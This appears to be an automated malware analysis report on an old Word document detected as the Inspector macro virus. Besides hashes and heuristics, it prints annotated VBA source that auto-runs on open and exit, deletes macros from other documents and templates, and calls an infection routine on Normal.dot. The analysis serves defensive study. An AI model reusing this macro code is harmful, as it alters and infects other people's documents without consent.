Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 848a772890397b81…

MALICIOUS

Office (OLE)

772.5 KB · Created: 2001-04-14 04:52:00 · Authoring application: Microsoft Word 8.0 · First seen: 2012-06-14
MD5: 4c5dfceee02302802db00a88bee45f17 SHA-1: b2056d8392f81e0e5100386bcc9442c19945e939 SHA-256: 848a772890397b81cc53c73ad43a350fc3d43cbf80c8faa1874d9d0296e76ac9
Risk score: 220

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature 'Doc.Trojan.Inspector-1'. It contains multiple VBA macros, including AutoOpen, Document_Open, and Auto_Close, which are commonly used to execute malicious code upon opening or closing a document. The presence of a 'VirusInspect' module with functions that delete procedures from VBA code modules (sparing its own, which are marked with "Wu"), together with an Init routine that calls InfectTo on the Normal template, suggests an attempt to self-modify or evade analysis.

Heuristics (6)

  • ClamAV: Doc.Trojan.Inspector-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Inspector-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of a legacy Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (16)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 31995 bytes
SHA-256: fefa910e096600845d1fe0e1d50ead0b674e20d859d857ba22ea1f233065bc1f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' ThisDocument module: only the exported Attribute header is present in this
' extract; no procedures appear before the next module starts, so the
' Document_Open handler reported by the heuristics is not visible here.

Attribute VB_Name = "VirusInspect"
' Inspector Version 8.2
' Module-level state shared by the procedures below (names as in the sample).
Option Explicit


Dim KillCount As Integer   ' procedures deleted so far: +1 in DeleteCode, reset in Init and DetectAll
Dim sAutoNames  As Variant   ' array of auto-executing procedure names, assigned in Init

Dim bInited As Boolean   ' True once Init has completed
Dim LatestVer As Double   ' not referenced in the visible excerpt
Dim g_VBCom As Variant   ' not referenced in the visible excerpt
Dim DetectedList As New Collection   ' names of documents already processed; see Detected / SetDetectedFlag / ClearReg
Const Logo As String = "Wu's Macro Virus Inspector "   ' not referenced in the visible excerpt



' Return the 1-based position of doc.Name in DetectedList, or 0 when the
' document has not been recorded. Callers use the result both as a boolean
' (KillVirus) and as an index for Collection.Remove (SetDetectedFlag).
Function Detected(doc As Variant) As Integer
Dim i As Integer
For i = 1 To DetectedList.count
  If (doc.Name = DetectedList.Item(i)) Then
    Detected = i
    Exit Function
  End If
Next
    Detected = 0
End Function
' Record (f = True) or forget (f = False) doc.Name in DetectedList.
' Adding is skipped when the name is already present and removing is skipped
' when it is absent, so repeating either call does not change the list.
Sub SetDetectedFlag(doc As Variant, ByVal f As Boolean)
Dim i As Integer
i = Detected(doc)
If (f) Then
    If (i < 1) Then
        DetectedList.Add (doc.Name)
    End If
Else
    If (i > 0) Then
        DetectedList.Remove (i)
    End If
End If
End Sub
' Empty DetectedList by removing its first item until none remain.
Sub ClearReg()
While DetectedList.count > 0
    DetectedList.Remove (1)
Wend
End Sub



' Delete n lines starting at line st from the VBE code module cm and count
' the deletion in KillCount. ShowStatus is not defined in the visible
' excerpt (presumably a status-bar/message helper). The status text gives
' st + n as the end, which is one past the last deleted line, and lacks a
' space before "to".
Sub DeleteCode(cm As Variant, ByVal st, n As Long)
KillCount = KillCount + 1
Call cm.deletelines(st, n)
ShowStatus ("Delete From Line " & st & "to " & st + n)
End Sub
' Remove the procedure called Name from code module cm, unless the first
' line of that procedure contains "Wu" (case-insensitive) - the marker this
' module puts on its own procedures ('Wu's Sub), so it never deletes itself.
' Any runtime error after the Find (e.g. Name is not a procedure in cm) is
' silently swallowed by the Err label.
Sub KillSub(cm As Variant, ByVal Name As String)
Dim i, n As Long   ' i is Variant; only n is typed Long (VBA types each variable separately)
'Dim cmd As CodeModule

  ' Whole-module search for Name; nothing to do if it is absent.
  If (Not cm.Find(Name, 1, 1, cm.CountOfLines + 1, 1)) Then
   Exit Sub
  End If
  On Error GoTo Err
   i = cm.ProcStartLine(Name, 0) 'vbext_pk_Proc)
   n = cm.ProcCountLines(Name, 0) ' vbext_pk_Proc)
    ' Spare procedures carrying the module's own "Wu" marker on their first line.
    If (InStr(1, cm.Lines(i, 1), "Wu", vbTextCompare) < 1) Then
     Call DeleteCode(cm, i, n)
    End If
    Exit Sub
Err:
End Sub
' For a code module whose name contains any entry of sAutoNames, delete its
' MAIN procedure. Presumably targets converted WordBasic macros, which become
' a module named after the macro with a MAIN entry point - confirm.
Sub KillAutoMod(md As Variant)
Dim Name As Variant
        For Each Name In sAutoNames
               If (InStr(1, md.Name, Name, vbTextCompare) > 0) Then
                        Call KillSub(md, "MAIN")
               End If
        Next Name
 
End Sub

' Scan every code module in doc's VBProject and delete auto-executing
' procedures (names from sAutoNames) plus the MAIN procedure of any
' auto-named module, then record doc in DetectedList. When something was
' deleted, DetectedList is cleared and a previously saved document is
' re-saved through SafeSave (not visible in this excerpt); otherwise the
' Saved flag is restored as found. Documents already in DetectedList are
' skipped. Requires programmatic access to the VBA project object model.
Sub KillVirus(doc As Variant) 'Document)
'VBProject
Dim prj As Variant 'VBProject
Dim obj As Variant   ' unused in the visible body
Dim Name As Variant
Dim j, n As Integer   ' j is Variant (only n is typed Integer); n is unused in the visible body
Dim md As Variant 'CodeModule
Dim VBCom As Variant 'VBComponents
Dim count As Integer   ' KillCount snapshot taken before scanning, compared afterwards
Dim saved As Boolean

Call Init
If (Detected(doc)) Then
     Exit Sub
End If

 saved = doc.saved
 
    count = KillCount
    Set prj = doc.VBProject
    Set VBCom = prj.VBComponents
    ' First pass: module-name based removal only.
    For j = 1 To VBCom.count
     Set md = VBCom.Item(j).codemodule
        Call KillAutoMod(md)
    Next j
    ' Second pass: procedure-name based removal, then module-name based again.
    For j = 1 To VBCom.count
    Set md = VBCom.Item(j).codemodule
        ShowStatus "Scanning In " & md.Name
        For Each Name In sAutoNames
         Call KillSub(md, Name)
        Next Name
        Call KillAutoMod(md)
    Next j
    
    Call SetDetectedFlag(doc, True)
'    prj.VBComponents(1).Activate
    If (KillCount > count) Then
        ClearReg   ' deletions happened: forget every processed document, including the entry just added for doc
        If (saved) Then
            Call SafeSave(doc)
        Else
         doc.saved = False
        End If
    Else
     If (saved) Then
     doc.saved = True
     End If
    End If
 
 End Sub
 
 
 
 
 
' Run KillVirus over every open document and every loaded template (Word's
' Documents and Templates collections), report the total through ShowStatus
' and reset KillCount.
' Message text (Chinese): "杀掉 N 个病毒!但未保存" = "Killed N viruses! but not saved";
' "未发现宏病毒!" = "No macro virus found!".
Sub DetectAll()

Dim doc As Variant 'Document
For Each doc In Documents
 Call KillVirus(doc)
Next
For Each doc In Templates
 Call KillVirus(doc)
Next
If (KillCount > 0) Then
    ShowStatus "杀掉 " & KillCount & "个病毒!但未保存"
Else
    ShowStatus "未发现宏病毒!"
End If
KillCount = 0
End Sub

 
 
 
  
 
' One-time setup, guarded by bInited: fill sAutoNames with the auto-macro
' procedure names, reset the Normal template's file attributes, and call
' InfectTo on the Normal template. InfectTo is not visible in this excerpt;
' its name and target suggest the module copies itself into Normal.dot - the
' replication that makes this sample malware rather than a utility - confirm
' in the full extract.
Sub Init()
    Dim i As Integer   ' unused in the visible body
    Dim obj As Variant
    
    If (bInited) Then
        Exit Sub
    End If
    'MsgBox "Init"
    sAutoNames = Array("Document_Close", "Document_Open", _
    "AutoClose", "AutoOpen", "Document_New", "AutoExec", _
     "AutoNew", "AutoExit")
    ' SetAttr replaces the attribute set: 32 = vbArchive only, so a read-only
    ' flag on Normal.dot would be cleared here, presumably so it can be written.
    Call SetAttr(Application.NormalTemplate.FullName, 32) 'vbArchive)
    Set obj = Application.NormalTemplate
    Call InfectTo(obj)
    KillCount = 0
    ClearReg
    bInited = True
End Sub
' Auto-executing entry point (runs when Word exits). The 'Wu's Sub marker on
' the Sub line is what KillSub checks to spare this module's own procedures.
Sub AutoExit() 'Wu's Sub
 Call DetectAll
End Sub
' Auto-executing entry point (runs when a document is opened); triggers the
' full scan. Carries the same 'Wu's Sub marker that KillSub uses to spare it.
Sub AutoOpen() 'Wu's Sub
 Call DetectAll
End Sub
Sub AutoNew() 'Wu's Sub
 Call Det
... (truncated)
ole10native_00.bin ole-package OLE Ole10Native stream: ObjectPool/_1048573574/Ole10Native 15492 bytes
SHA-256: c820e0070b49154c0cd0958fd784e9fc3d4bc5c55eef686cc782491a60fafb35
ole10native_01.bin ole-package OLE Ole10Native stream: ObjectPool/_1048574117/Ole10Native 23716 bytes
SHA-256: 816d007886a7edcfaa14c910218da02ddd1c3e9be3fe41c78cb0a6266d854476
ole10native_02.bin ole-package OLE Ole10Native stream: ObjectPool/_1048574509/Ole10Native 3236 bytes
SHA-256: 96471b6674dcb04b1c8c530a4a533fae8e5dd31bed39c6cbe4b1531f6eb7381f
ole10native_03.bin ole-package OLE Ole10Native stream: ObjectPool/_1048755155/Ole10Native 1956 bytes
SHA-256: 95c250f5632bbed4fd004b2bcca781534fc0b195a66486365d91a21088abdbcd
ole10native_04.bin ole-package OLE Ole10Native stream: ObjectPool/_1048755510/Ole10Native 10724 bytes
SHA-256: f7d7951f6971631d6ef3517b4d1de3719ee7f23433e8fdeb2196251cef240b10
ole10native_05.bin ole-package OLE Ole10Native stream: ObjectPool/_1048755999/Ole10Native 12132 bytes
SHA-256: 3053e92978917bf5de1711055a7808815a759866375c171e3898a2845fda1b2b
ole10native_06.bin ole-package OLE Ole10Native stream: ObjectPool/_1048756154/Ole10Native 26692 bytes
SHA-256: e141134c18036ff24d4681e1dd3e879a7a2722b2360e392e0259650a355ac0fd
ole10native_07.bin ole-package OLE Ole10Native stream: ObjectPool/_1048756410/Ole10Native 32132 bytes
SHA-256: e6589e6f3365193a3b382500220d30dcaf7d509842bd98879ff8d1d9b23a7714
ole10native_08.bin ole-package OLE Ole10Native stream: ObjectPool/_1048756448/Ole10Native 8932 bytes
SHA-256: 210c22e0247d8805614098a3d6a5a8aa790ec41502684d335df9f46029c37989
ole10native_09.bin ole-package OLE Ole10Native stream: ObjectPool/_1048756820/Ole10Native 26884 bytes
SHA-256: 275dd3da36073e348982410db6ebe2b27a10be098c88137700dcb4e97666f893
ole10native_10.bin ole-package OLE Ole10Native stream: ObjectPool/_1048757115/Ole10Native 35012 bytes
SHA-256: 5be12318fbb8d73ad57d48268788290b0a31c7a018acedfa7cc2731ca4abea96
ole10native_11.bin ole-package OLE Ole10Native stream: ObjectPool/_1048757229/Ole10Native 13252 bytes
SHA-256: 069b1cdaafdf792b0486b344d961ff419a0a03e31f075117007ad0b9686574a4
ole10native_12.bin ole-package OLE Ole10Native stream: ObjectPool/_1048757266/Ole10Native 29476 bytes
SHA-256: 1684490e54f11709b162c5367e37689c40d2bfb58f2ad07ba81fe1ca9f8cee41
ole10native_13.bin ole-package OLE Ole10Native stream: ObjectPool/_1048757368/Ole10Native 34308 bytes
SHA-256: 289822dc487d8f1d128bc17c72ad0140a48af786192291f04f825a25c93b9e07
ole10native_14.bin ole-package OLE Ole10Native stream: ObjectPool/_1048757615/Ole10Native 24900 bytes
SHA-256: 2fb2a14bfcae835c2342d459a9183f38b03a8a4eee48ff151508c4beaae5d579